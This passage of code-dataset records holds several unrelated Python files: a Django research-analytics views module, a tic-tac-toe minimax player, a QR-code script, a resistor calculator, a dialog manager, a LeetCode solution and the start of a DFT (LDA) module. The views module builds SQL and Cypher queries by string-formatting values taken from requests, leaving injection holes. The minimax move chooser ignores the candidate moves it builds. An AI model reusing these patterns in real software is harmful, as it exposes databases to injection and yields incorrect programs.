author[3]\n if author:\n query = (\"select word_en from keywords where author_scopus_id='%s'\" % author_scopus_id)\n results = conn.execute(query).fetchall()\n keywords = []\n for rec in results:\n keywords.append(rec[0])\n\n query = (\"select abstracts.id,abstracts.title_en from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id \"\n \"where authors.id=%s\" % author_id)\n abstracts = conn.execute(query).fetchall()\n fields = defaultdict(int)\n for abstract in abstracts:\n query = (\"select name from research_fields inner join field_has_abstract on \"\n \"field_has_abstract.field_id=research_fields.id inner join \"\n \"abstracts on field_has_abstract.abstract_id=abstracts.id \"\n \"where abstracts.id=%d\" % int(abstract[0]))\n results = conn.execute(query).fetchall()\n for f in results:\n fields[f[0]] += 1\n fields.default_factory = None\n return render(request, template_name=\"analytics/profile.html\",\n context={'author': author,\n 'abstracts': abstracts,\n 'profile': profile,\n 'degree': degrees.get(int(profile.degree), 'Other'),\n 'fields': fields,\n 'keywords': keywords})\n\n\ndef main_db(request):\n total_words = conn.execute('select count(*) from keywords').scalar()\n total_abstracts = conn.execute('select count(*) from abstracts').scalar()\n fields = []\n query = ('select count(*), name from research_fields inner join '\n 'field_has_abstract on field_has_abstract.field_id=research_fields.id group by name;')\n for field in conn.execute(query).fetchall():\n fields.append(field)\n\n fields = sorted(fields, key=lambda x: x[0], reverse=True)\n return render(request, template_name=\"analytics/main.html\",\n context={'total_words': total_words,\n 'total_abstracts': total_abstracts,\n 'fields': fields\n })\n\n\ndef show_field(request, field_name):\n query = 'MATCH (f:Field{name:\"%s\"})-[:IN]-(:Abstract)-[:AUTHORED]-(au:Author)-[:AFFILIATE]-(af:Affiliation{country:\"Thailand\"}) RETURN f,au,af' % field_name\n results = list(graph.run(query))\n authors = []\n if results:\n for res in results:\n authors.append((res['au'], res['af']))\n return render(request, template_name=\"analytics/field_author.html\",\n context={'authors': authors, 'field': field_name})\n\ndef show_profile_by_name(request):\n first_name = request.GET.get('firstname', '')\n last_name = request.GET.get('lastname', '')\n first_name = first_name.replace(\"'\", \"\\'\") if first_name else first_name\n last_name = last_name.replace(\"'\", \"\\'\") if last_name else last_name\n degrees = {1: 'Bachelor', 2: 'Master', 3: 'Doctorate'}\n if first_name and last_name:\n author = conn.execute(\"select * from authors where \"\n \"lower(first_name)=lower(%s) and lower(last_name)=lower(%s)\",\n (first_name, last_name)).fetchone()\n if author:\n if author.scholarship_info_id:\n profile = conn.execute('select * from scholarship_info where scholarship_info.id=%d'\n % author.scholarship_info_id).fetchone()\n degree = degrees.get(profile.degree, '')\n else:\n profile = None\n degree = ''\n keywords = conn.execute(\"select word_en,count from keywords where author_scopus_id='%s'\"\n % author.scopus_id).fetchall()\n keywords = set([(kw.word_en,kw.count) for kw in keywords])\n keywords = sorted(keywords, key=lambda x: x[1], reverse=True)\n query = (\"select abstracts.id,abstracts.title_en \"\n \"from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id \"\n \"where authors.id=%s\" % author.id)\n abstracts = conn.execute(query).fetchall()\n fields = defaultdict(int)\n for abstract in abstracts:\n query = (\"select name from research_fields inner join field_has_abstract on \"\n \"field_has_abstract.field_id=research_fields.id inner join \"\n \"abstracts on field_has_abstract.abstract_id=abstracts.id \"\n \"where abstracts.id=%d\" % int(abstract[0]))\n results = conn.execute(query).fetchall()\n for f in results:\n fields[f[0]] += 1\n fields.default_factory = None\n query = (\"select name, country, year from affil_history inner join affils \"\n \"on affils.id=affiliation_id where author_id=%s;\" % author.id)\n affiliations = set((tuple(af) for af in conn.execute(query).fetchall()))\n affiliations = sorted(affiliations, key=lambda x: x[2])\n\n return render(request, template_name=\"analytics/profile_by_name.html\",\n context={'author': author, 'abstracts': abstracts,\n 'fields': fields, 'affils': affiliations,\n 'keywords': keywords, 'profile': profile,\n 'degree': degree})\n return render(request, template_name=\"analytics/profile_by_name.html\",\n context={})\n\n\ndef show_abstract(request, abstract_id):\n if abstract_id:\n abstract = conn.execute(\"select * from abstracts where id=%s;\" % abstract_id).fetchone()\n if abstract:\n authors = conn.execute(\"select authors.* from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id where abstracts.id=%s;\"\n % abstract_id).fetchall()\n keywords = conn.execute(\"select * from keywords inner join abstract_has_keywords \"\n \"on abstract_has_keywords.keyword_id=keywords.id inner join \"\n \"abstracts on abstract_has_keywords.abstract_id=abstracts.id \"\n \"where abstracts.id=%s\" % abstract_id).fetchall()\n keywords = set([kw.word_en for kw in keywords])\n print(keywords)\n return render(request, template_name='analytics/abstract.html',\n context={'authors': authors, 'abstract': abstract, 'keywords': keywords})\n return render(request, template_name='analytics/abstract.html',\n context={'authors': [], 'abstract': None})\n\n\ndef show_abstract_per_person(request):\n data = []\n for rec in conn.execute(\" select status, count(*) as c from scholarship_info group by status;\"):\n data.append(rec[1])\n return JsonResponse({'data': data})\n\ndef get_num_active_scholar_studs(request):\n actives = {}\n totals = {}\n sqlquery = ('select affil,count(*) as c from active_scholar_students '\n 'inner join scholarship_info on scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true '\n 'group by affil order by c desc limit 30;')\n for affil, cnt in conn.execute(sqlquery):\n actives[affil] = cnt\n\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'where scholarship_info.status=true '\n 'group by affil;')\n\n active_data = []\n inactive_data = []\n labels = []\n activecolors = []\n inactivecolors = []\n for affil, cnt in conn.execute(sqlquery):\n totals[affil] = cnt\n\n sorted_active_data = sorted([(k,v) for k,v in actives.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_active_data:\n active_data.append(actives[k])\n inactive_data.append(totals[k] - actives[k])\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors,\n 'labels': labels})\n\n\ndef get_abstract_fields(request):\n sqlquery = ('select abbr,count(*) as c from field_has_abstract '\n 'inner join research_fields on research_fields.id=field_has_abstract.field_id '\n 'inner join abstracts on field_has_abstract.abstract_id=abstracts.id '\n 'where abstracts.pub_date>\\'2013-01-01\\' '\n 'group by abbr order by c desc;')\n data = []\n labels = []\n backgroundColors = []\n for f,n in conn.execute(sqlquery):\n data.append(n)\n labels.append(f)\n backgroundColors.append('rgb(100,116,164)')\n\n return JsonResponse({'data': data, 'labels': labels, 'backgroundColors': backgroundColors})\n\n\ndef get_researcher_by_field(request):\n inactive_counts = defaultdict(int)\n active_counts = defaultdict(int)\n\n all_researchers = defaultdict(dict)\n sqlquery = ('select authors.id,research_fields.abbr,count(research_fields.abbr) as num_papers from field_has_abstract inner join research_fields on field_has_abstract.field_id=research_fields.id '\n 'inner join abstract_has_author on abstract_has_author.abstract_id=field_has_abstract.abstract_id '\n 'inner join authors on authors.id=abstract_has_author.author_id '\n 'inner join scholarship_info on scholarship_info.id=authors.scholarship_info_id '\n 'where scholarship_info.status=true '\n 'group by authors.id,abbr '\n 'order by authors.id,num_papers desc;')\n for auth_id, field_abbr, num_papers in conn.execute(sqlquery):\n if auth_id not in all_researchers:\n all_researchers[auth_id] = field_abbr\n\n active_researchers = set()\n sqlquery = 'select author_id from active_scholar_students;'\n for row in conn.execute(sqlquery):\n active_researchers.add(row[0])\n\n\n for auth_id in all_researchers:\n if auth_id in active_researchers:\n active_counts[all_researchers[auth_id]] += 1\n else:\n inactive_counts[all_researchers[auth_id]] += 1\n\n actives = []\n inactives = []\n labels = []\n activecolors = []\n inactivecolors = []\n data = [(k,v) for k,v in active_counts.items()]\n sorted_fields = [k for k,v in sorted(data,key=lambda x: x[1], reverse=True)]\n for field in sorted_fields:\n actives.append(active_counts[field])\n inactives.append(inactive_counts[field])\n labels.append(field)\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n\n return JsonResponse({'actives': actives, 'inactives': inactives,\n 'labels': labels,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors})\n\n\ndef get_scholar_joined_tm_ratio(request):\n sqlquery = ('select count(*) as c from tm_researcher_profile;')\n total_tm = conn.execute(sqlquery).scalar()\n sqlquery = ('select count(*) as c from tm_researcher_profile '\n 'where scholarship_info_id is not NULL')\n total_scholar = conn.execute(sqlquery).scalar()\n return JsonResponse({'data': [total_scholar, total_tm],\n 'labels': ['scholarship', 'non-scholarship']})\n\n\ndef get_num_active_scholar_tm(request):\n actives = {}\n totals = {}\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true '\n 'group by affil order by c desc limit 30;')\n for affil, cnt in conn.execute(sqlquery):\n actives[affil] = cnt\n\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'where scholarship_info.status=true '\n 'group by affil;')\n\n active_data = []\n inactive_data = []\n labels = []\n activecolors = []\n inactivecolors = []\n for affil, cnt in conn.execute(sqlquery):\n totals[affil] = cnt\n\n sorted_active_data = sorted([(k,v) for k,v in actives.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_active_data:\n active_data.append(actives[k])\n inactive_data.append(totals[k] - actives[k])\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors,\n 'labels': labels})\n\n\ndef get_activeness_scholar_tm(request):\n tm_actives = {}\n totals = {}\n sqlquery = ('select affil,count(*) as c from active_scholar_students '\n 'inner join scholarship_info on active_scholar_students.scholarship_info_id=scholarship_info.id '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=active_scholar_students.scholarship_info_id '\n 'where scholarship_info.status=true '\n 'group by affil;')\n for affil, cnt in conn.execute(sqlquery):\n tm_actives[affil] = cnt\n\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true '\n 'group by affil;')\n\n labels = []\n inactive_data = []\n active_data = []\n activecolors = []\n inactivecolors = []\n for affil, cnt in conn.execute(sqlquery):\n totals[affil] = cnt\n\n sorted_active_data = sorted([(k,v) for k,v in totals.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_active_data:\n if k in tm_actives:\n inactive_data.append(totals[k]-tm_actives[k])\n active_data.append(tm_actives[k])\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors,\n 'labels': labels})\n\n\ndef get_tm_researchers_graph_data(request):\n sqlquery = ('select authors.id from authors '\n 'inner join scholarship_info on authors.scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true')\n\n scholars = set()\n for row in conn.execute(sqlquery):\n scholars.add(row[0])\n\n\n sqlquery = ('select authors.id, abstracts.id from scholarship_info '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=scholarship_info.id '\n 'inner join authors on scholarship_info.id=authors.scholarship_info_id '\n 'inner join abstract_has_author on abstract_has_author.author_id=authors.id '\n 'inner join abstracts on abstract_has_author.abstract_id=abstracts.id '\n 'where scholarship_info.status=true '\n )\n\n tm_abstracts = set()\n tm_authors = set()\n for author_id, abstract_id in conn.execute(sqlquery):\n tm_abstracts.add(abstract_id)\n tm_authors.add(author_id)\n\n sqlquery = ('select authors.id,authors.first_name, authors.last_name,abstracts.id from abstracts '\n 'inner join abstract_has_author on abstract_has_author.abstract_id=abstracts.id '\n 'inner join authors on abstract_has_author.author_id=authors.id;'\n )\n abstracts = {}\n for author_id, first_name, last_name, abstract_id in conn.execute(sqlquery):\n if abstract_id in tm_abstracts:\n if abstract_id in abstracts:\n abstracts[abstract_id].append((author_id, '{} {}'.format(first_name, last_name)))\n else:\n abstracts[abstract_id] = [(author_id, '{} {}'.format(first_name, last_name))]\n\n edges = {}\n nodes = {}\n n = 0\n for abstract_id, authors in abstracts.items():\n n += 1\n first_author_id = authors[0][0]\n if first_author_id not in nodes:\n nodes[first_author_id] = {'name': authors[0][1], 'papers': 1}\n else:\n nodes[first_author_id]['papers'] += 1\n if first_author_id not in edges:\n edges[first_author_id] = {}\n if len(authors) > 1:\n for author in authors[1:]:\n if author[0] not in nodes:\n nodes[author[0]] = {'name': author[1], 'papers': 1}\n else:\n nodes[author[0]]['papers'] += 1\n if author[0] in edges and edges[author[0]].get(first_author_id, None):\n continue\n else:\n edges[first_author_id][author[0]] = edges[first_author_id].get(author[0], 0) + 1\n\n nodes_data = []\n edges_data = []\n flt_nodes = set()\n for n in nodes:\n if nodes[n]['papers'] > 2:\n flt_nodes.add(n)\n if n in tm_authors:\n color = '#ff9900'\n elif n in scholars:\n color = '#33cc33'\n else:\n color = '#0099ff'\n nodes_data.append({\n 'id': n,\n 'value': nodes[n]['papers'],\n 'label': nodes[n]['name'],\n 'color': color\n })\n for _from in list(flt_nodes):\n for _to in edges.get(_from, []):\n if edges[_from][_to] >= 1:\n edges_data.append({\n 'from': _from,\n 'to': _to,\n 'value': edges[_from][_to],\n 'title': '{} publications'.format(edges[_from][_to])\n })\n if _to not in flt_nodes:\n if _to in tm_authors:\n color = '#ff9900'\n elif n in scholars:\n color = '#33cc33'\n else:\n color = '#0099ff'\n nodes_data.append({\n 'id': _to,\n 'value': nodes[_to]['papers'],\n 'label': nodes[_to]['name'],\n 'color': color\n })\n flt_nodes.add(_to)\n\n\n return JsonResponse({'edges': edges_data, 'nodes': nodes_data})\n\n\ndef show_scholar_dashboard(request):\n return render(request, template_name=\"analytics/scholar-dashboard.html\",\n context={'board': 'scholar'})\n\ndef show_gjb_dashboard(request):\n return render(request, template_name=\"analytics/gjb-dashboard.html\",\n context={'board': 'gjb'})\n\ndef show_tm_dashboard(request):\n return render(request, template_name=\"analytics/tm-dashboard.html\",\n context={'board': 'tm'})\n\ndef show_network_dashboard(request):\n return render(request, template_name=\"analytics/network-dashboard.html\",\n context={'board': 'network'})\n\ndef count_gjb_by_status(request):\n data = []\n sqlquery = (\"select count(*), finished from gjb_researcher_profile inner join gjb_theses on gjb_researcher_profile.id=gjb_theses.researcher_id group by finished\")\n for rec in conn.execute(sqlquery):\n data.append(rec[0])\n return JsonResponse({'data': data})\n\ndef count_gjb_by_status_affil(request):\n data = []\n sqlquery = (\"select count(*),finished, university_th from gjb_researcher_profile as gp \"\n \"inner join gjb_theses on gjb_theses.researcher_id=gp.id \"\n \"group by finished,university_th order by university_th\")\n labels = []\n unfinished_data = []\n finished_data = []\n finished_colors = []\n unfinished_colors = []\n finished_dict = defaultdict(int)\n unfinished_dict = defaultdict(int)\n for cnt, finished, affil in conn.execute(sqlquery):\n if finished:\n finished_dict[affil] += cnt\n else:\n unfinished_dict[affil] += cnt\n\n sorted_finished_data = sorted([(k,v) for k,v in finished_dict.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_finished_data:\n unfinished_data.append(unfinished_dict[k])\n finished_data.append(finished_dict[k])\n finished_colors.append('rgb(199,0,57)')\n unfinished_colors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': finished_data,\n 'inactives': unfinished_data,\n 'activecolors': finished_colors,\n 'inactivecolors': unfinished_colors,\n 'labels': labels})\n\ndef count_active_gjb_researcher(request):\n active_university_dict = defaultdict(int)\n inactive_university_dict = defaultdict(int)\n total_university_dict = defaultdict(int)\n for res in conn.execute(\n 'select * from gjb_researcher_profile as gp inner join gjb_theses on gjb_theses.researcher_id=gp.id where gjb_theses.finished=TRUE'):\n uni = res[11]\n total_university_dict[uni] += 1\n if res[5] and res[6]:\n first_name, last_name = res[5].lower(), res[6].lower()\n sqlquery = \"select * from recent_pubs where lower(first_name)='%s' and lower(last_name)='%s'\" % (\n first_name, last_name)\n total_pubs = list(pubconn.execute(sqlquery))\n if len(total_pubs) > 0:\n active_university_dict[uni] += 1\n for uni in total_university_dict:\n inactive_university_dict[uni] = total_university_dict[uni] - active_university_dict[uni]\n\n sorted_active_data = sorted([(k,v) for k,v in active_university_dict.items()],\n key=lambda x: x[1], reverse=True)\n active_data = []\n inactive_data = []\n active_colors = []\n inactive_colors = []\n labels = []\n for k,v in sorted_active_data:\n active_data.append(inactive_university_dict[k])\n inactive_data.append(active_university_dict[k])\n active_colors.append('rgb(199,0,57)')\n inactive_colors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': active_colors,\n 'inactivecolors': inactive_colors,\n 'labels': labels})\n\ndef count_gjb_pub_by_field(request):\n fields = defaultdict(int)\n sc_fields = defaultdict(int)\n for res in conn.execute(\"select * from gjb_researcher_profile as gp \"\n \"inner join gjb_theses on gjb_theses.researcher_id=gp.id \"\n \"where gjb_theses.finished=TRUE\"):\n if res[5] and res[6]:\n first_name, last_name = res[5].lower(), res[6].lower()\n sqlquery = (\"select * from recent_pubs where lower(first_name)='%s' \"\n \"and lower(last_name)='%s'\") % (first_name, last_name)\n for rec in pubconn.execute(sqlquery):\n field = rec[3]\n fields[field] += 1\n\n\n gjb_counts = []\n sqlquery = ('select abbr,count(*) as c from field_has_abstract '\n 'inner join research_fields on research_fields.id=field_has_abstract.field_id '\n 'inner join abstracts on field_has_abstract.abstract_id=abstracts.id '\n 'where abstracts.pub_date>\\'2013-01-01\\' '\n 'group by abbr order by c desc;')\n sc_counts = []\n labels = []\n for f,n in conn.execute(sqlquery):\n sc_fields[f] += n\n\n for field in fields:\n labels.append(field)\n gjb_counts.append(fields[field])\n sc_counts.append(sc_fields[field])\n\n\n return JsonResponse({'gjb_counts': gjb_counts, 'labels': labels, 'sc_counts': sc_counts})\n\n","sub_path":"web/code/tm/analytics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":30799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"142980084","text":"import random\n\nBOARD = ['a1', 'a2', 'a3', 'b1', 'b2', 'b3', 'c1', 'c2', 'c3']\nwin = [['a1', 'a2', 'a3'], ['b1', 'b2', 'b3'], ['c1', 'c2', 'c3'], ['a1', 'b1', 'c1'], ['a2', 'b2', 'c2'], ['a3', 'b3', 'c3'], ['a1', 'b2', 'c3'], ['a3', 'b2', 'c1']]\n\ndef minimax(ox, oz, depth, level, player):\n if depth == 0: \n for pos in win:\n ok = 1\n for i in pos:\n if not (i in ox):\n ok = 0\n break \n if ok == 1: \n return 1 if player else -1\n ok = 1\n for i in pos:\n if not(i in oz):\n ok = 0\n break\n if ok == 1:\n return 1 if player == False else -1\n return 0\n alfa = -1000\n available = list( set(BOARD) - set(ox) - set(oz) )\n for child in available:\n if level == False:\n oz_=oz[:]\n oz_.append(child)\n alfa = max(alfa, -minimax(ox, oz_, depth-1, not(level), player))\n else:\n ox_=ox[:]\n ox_.append(child)\n alfa = max(alfa, -minimax(ox_, oz, depth-1, not(level), player))\n return alfa;\n \n \n\ndef play_turn(\n player_role,\n owned_by_x,\n owned_by_zero\n ):\n\n #print player_role, owned_by_x, owned_by_zero\n available_squares = list( set(BOARD) - set(owned_by_x) - set(owned_by_zero) )\n best1=-1; best2=1;\n el = BOARD[0]\n for i in available_squares:\n if player_role == 'x':\n x = owned_by_x[:]\n x.append(i)\n mini = minimax(owned_by_x,owned_by_zero,len(available_squares),True,True)\n if mini > best1:\n best1 = mini\n el = i\n else: \n z = owned_by_zero[:]\n z.append(i)\n mini = minimax(owned_by_x,owned_by_zero,len(available_squares),True,False)\n if mini < best2:\n best2 = mini\n el = i\n return el\n #return random.choice(available_squares)\n\n","sub_path":"tictactoe/adibranescu/tictactoe_play_turn.py","file_name":"tictactoe_play_turn.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"206761772","text":"import qrcode\n\nqr = qrcode.QRCode(\n version=5,\n box_size=5,\n border=2\n)\ndata = 'www.billavamsikrishna.co'\nqr.add_data(data)\nqr.make(fit=True)\nimg = qr.make_image(fill_color='green',back_color='white')\nimg.save('vamsi.png')\n","sub_path":"Making a py qr code/qrcodevamsi.py","file_name":"qrcodevamsi.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"24499598","text":"n_max = 150 #Numero maximo de resistores na associacao\ncnt = 0\nprint (\"======= Calculo de associacao de resistores =========\")\nvalue = (float)(input(\"valor do resistor fixo: \"))\nobj_value = (float)(input(\"Valor do resistor desejado: \"))\nobj_err = (float)(input(\"Maximo erro da resistencia: \"))\n\nprint (\"**********************************************************************\")\nprint(\"\")\nfor p in range(1,n_max):\n for s2 in range(1,n_max):\n for s1 in range(1,n_max):\n n=s1*s2*p\n if(n <= n_max):\n res = ((value * s1)/p)*s2\n error = abs(obj_value - res) \n if error < obj_err:\n print (\"Valor: %.3f, Erro = %.3f, N = %i, s1 = %i, s2 = %i,0 p = %i\" %(res,error,n,s1,s2,p))\n cnt = cnt + 1\nprint(\"\")\nprint (\"**********************************************************************\")\nprint (\"Combinacoes possiveis: %i\" %(cnt))\nprint(\"\")\nprint(\"\")\n","sub_path":"res.py","file_name":"res.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"262914079","text":"from .dialog_manager_super import DialogManagerBase\n\n\nclass TelegramDialogManager(DialogManagerBase):\n\n def initialize_episode(self):\n \"\"\" Refresh state for new dialog \"\"\"\n\n super().initialize_episode()\n self.user.initialize_episode()\n self.agent.initialize_episode()\n\n def next_turn(self, message):\n \"\"\" This function initiates each subsequent exchange between agent and user (agent first) \"\"\"\n\n ########################################################################\n # CALL USER TO TAKE HER TURN\n ########################################################################\n\n user_action = self.user.next(message)\n self.state_tracker.update(user_action=user_action)\n\n ########################################################################\n # CALL AGENT TO TAKE HER TURN\n ########################################################################\n\n agent_state = self.state_tracker.get_state_for_agent()\n agent_action = self.agent.state_to_action(agent_state)\n\n ########################################################################\n # Register AGENT action with the state_tracker\n ########################################################################\n self.state_tracker.update(agent_action=agent_action)\n\n self.agent.add_nl_to_action(agent_action)\n agent_ans = agent_action['act_slot_response']['nl']\n\n if user_action['diaact'] == \"thanks\":\n agent_ans = 'Thank you, good bye!'\n self.episode_over = True\n\n return self.episode_over, agent_ans","sub_path":"src/deep_dialog/dialog_system/dialog_manager_telegram.py","file_name":"dialog_manager_telegram.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"36054575","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\n# author:lwz\n\nstr = \"loveleetcode\"\n\nclass Solution:\n def firstUniqChar(self, s):\n obj, min = {}, len(s)\n for i, j in enumerate(s):\n if j in obj:\n obj[j].append(i)\n else:\n obj.setdefault(j, [i])\n for i in obj:\n if len(obj[i]) == 1:\n min = obj[i][0] if obj[i][0] < min else min\n if min == len(s):\n return -1\n return min\n\nsolution = Solution()\nmin = solution.firstUniqChar(str)\nprint(min)","sub_path":"Week 08/id_524/LeetCode_387_524.py","file_name":"LeetCode_387_524.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"623726666","text":"\"\"\"Uses the [adiabatic] local density approximation ([A]LDA) to calculate the [time-dependent] \nelectron density [and current] for a system of N electrons.\n\nComputes approximations to V_KS, V_H, V_xc using the LDA self-consistently. For ground state \ncalculations the code outputs the LDA orbitals and energies of the system, the ground-state \ncharge density and Kohn-Sham potential. For time dependent calculations the code also outputs \nthe time-dependent charge and current densities and the time-dependent Kohn-Sham potential.\n\nNote: Uses the LDAs developed in [Entwistle2018]_ from finite slab systems and the HEG, \nin one dimension.\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport copy\nimport numpy as np\nimport scipy as sp\nimport scipy.sparse as sps\nimport scipy.linalg as spla\nimport scipy.sparse.linalg as spsla\n\nfrom . import LDA_parameters\nfrom . import RE_cython\nfrom . import results as rs\nfrom . import mix\nfrom . import minimize\n\n\ndef groundstate(pm, H):\n r\"\"\"Calculates the ground-state of the system for a given potential.\n\n .. math:: \n \n \\hat{H} \\phi_{j} = \\varepsilon_{j} \\phi_{j}\n\n parameters\n ----------\n pm : object\n Parameters object\n H : array_like\n 2D array of the Hamiltonian matrix in band form, indexed as H[band,space_index]\n\n returns\n -------\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n eigenvalues : array_like\n 1D array of the Kohn-Sham eigenvalues, indexed as eigenvalues[orbital_number]\n \"\"\"\n # Solve the Kohn-Sham equations\n eigenvalues, orbitals = spla.eig_banded(H, lower=True)\n \n # Normalise the orbitals\n orbitals /= np.sqrt(pm.space.delta)\n\n # Calculate the electron density\n density = electron_density(pm, orbitals)\n\n return density, orbitals, eigenvalues\n\n\ndef electron_density(pm, orbitals):\n r\"\"\"Calculates the electron density from the set of orbitals.\n\n .. math:: \n\n n(x) = \\sum_{j=1}^{N}|\\phi_{j}(x)|^{2}\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n\n returns\n -------\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n \"\"\"\n density = np.sum(np.absolute(orbitals[:,:pm.sys.NE])**2, axis=1)\n\n return density\n\n\ndef ks_potential(pm, density, perturbation=False):\n r\"\"\"Calculates the Kohn-Sham potential from the electron density.\n\n .. math::\n\n V_{\\mathrm{KS}} = V_{\\mathrm{ext}} + V_{\\mathrm{H}} + V_{\\mathrm{xc}}\n\n parameters\n ----------\n pm : object\n Parameters object\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n perturbation: bool\n - True: Perturbed external potential\n - False: Unperturbed external potential\n\n returns\n -------\n v_ks : array_like\n 1D array of the Kohn-Sham potential, indexed as v_ks[space_index]\n \"\"\"\n v_ks = pm.space.v_ext + hartree_potential(pm, density) + xc_potential(pm, density)\n if perturbation:\n v_ks += pm.space.v_pert\n\n return v_ks\n\n\ndef banded_to_full(pm, H):\n r\"\"\"Converts the Hamiltonian matrix in band form to the full matrix.\n\n parameters\n ----------\n pm : object\n Parameters object\n H : array_like\n 2D array of the Hamiltonian matrix in band form, indexed as H[band,space_index]\n\n returns\n -------\n H_full : array_like\n 2D array of the Hamiltonian matrix in full form, indexed as H_full[space_index,space_index]\n \"\"\"\n # Stencil used\n sd = pm.space.second_derivative_band\n nbnd = len(sd)\n\n # Add the band elements to the full matrix\n H_full = np.zeros((pm.space.npt,pm.space.npt), dtype=np.float)\n for ioff in range(nbnd):\n d = np.arange(pm.space.npt-ioff)\n H_full[d,d+ioff] = H[ioff,d]\n H_full[d+ioff,d] = H[ioff,d]\n\n return H_full\n\n\ndef kinetic(pm):\n r\"\"\"Stores the band elements of the kinetic energy matrix in lower form. The kinetic energy matrix \n is constructed using a three-point, five-point or seven-point stencil. This yields an NxN band \n matrix (where N is the number of grid points). For example with N=6 and a three-point stencil:\n \n .. math::\n\n K = -\\frac{1}{2} \\frac{d^2}{dx^2}= \n -\\frac{1}{2} \\begin{pmatrix} \n -2 & 1 & 0 & 0 & 0 & 0 \\\\ \n 1 & -2 & 1 & 0 & 0 & 0 \\\\ \n 0 & 1 & -2 & 1 & 0 & 0 \\\\ \n 0 & 0 & 1 & -2 & 1 & 0 \\\\ \n 0 & 0 & 0 & 1 & -2 & 1 \\\\ \n 0 & 0 & 0 & 0 & 1 & -2 \n \\end{pmatrix} \n \\frac{1}{\\delta x^2} \n = [\\frac{1}{\\delta x^2},-\\frac{1}{2 \\delta x^2}] \n\n parameters\n ----------\n pm : object\n Parameters object\n\n returns array_like\n 2D array containing the band elements of the kinetic energy matrix, indexed as \n K[band,space_index]\n \"\"\"\n # Stencil to use\n sd = pm.space.second_derivative_band\n nbnd = len(sd)\n\n # Band elements\n K = np.zeros((nbnd, pm.space.npt), dtype=np.float)\n for i in range(nbnd):\n K[i,:] = -0.5 * sd[i]\n\n return K\n\n\ndef hamiltonian(pm, v_ks=None, orbitals=None, perturbation=False):\n r\"\"\"Constructs the Hamiltonian matrix in band form for a given Kohn-Sham potential.\n\n .. math::\n\n \\hat{H} = \\hat{K} + \\hat{V}_{\\mathrm{KS}}\n\n parameters\n ----------\n pm : object\n Parameters object\n v_ks : array_like\n 1D array of the Kohn-Sham potential, indexed as v_ks[space_index]\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n perturbation: bool\n - True: Perturbed external potential\n - False: Unperturbed external potential\n\n returns\n -------\n H : array_like\n 2D array of the Hamiltonian matrix in band form, indexed as H[band,space_index]\n \"\"\"\n # Kinetic energy matrix\n H = kinetic(pm)\n\n # Calculate the Kohn-Sham potential from the orbitals\n if orbitals is not None:\n density = electron_density(pm, orbitals)\n if perturbation:\n v_ks = ks_potential(pm, density, perturbation=True) \n else:\n v_ks = ks_potential(pm, density)\n\n # Add the Kohn-Sham potential to the Hamiltonian\n H[0,:] += v_ks\n\n return H\n\n\ndef hartree_potential(pm, density):\n 